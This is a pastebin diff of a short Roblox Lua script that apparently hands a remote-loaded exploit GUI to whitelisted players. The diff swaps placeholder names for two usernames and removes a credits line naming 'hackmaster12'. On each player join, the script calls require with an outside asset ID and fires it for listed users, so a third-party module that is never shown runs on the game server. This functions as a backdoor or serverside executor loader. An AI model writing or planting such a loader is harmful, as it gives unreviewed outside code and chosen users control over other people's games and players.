View difference between Paste ID: nTBCWR6q and 9EDtQ9SV
SHOW: | | - or go back to the newest paste.
1
-- Please watch the vid before doing this
2
-- By DennisH1mself
3-
local allowed = {"Your Username", "A friends name"}
3+
local allowed = {"artucox7", "Michel_doie"}
4-
-- Credits on the gui to Jetray and hackmaster12
4+
5
game.Players.PlayerAdded:Connect(function(player)
6
	for i, v in pairs(allowed) do
7
		if player.Name == v then
8
			require(3146633195):Fire(player.Name)
9
		end
10
	end
11
end)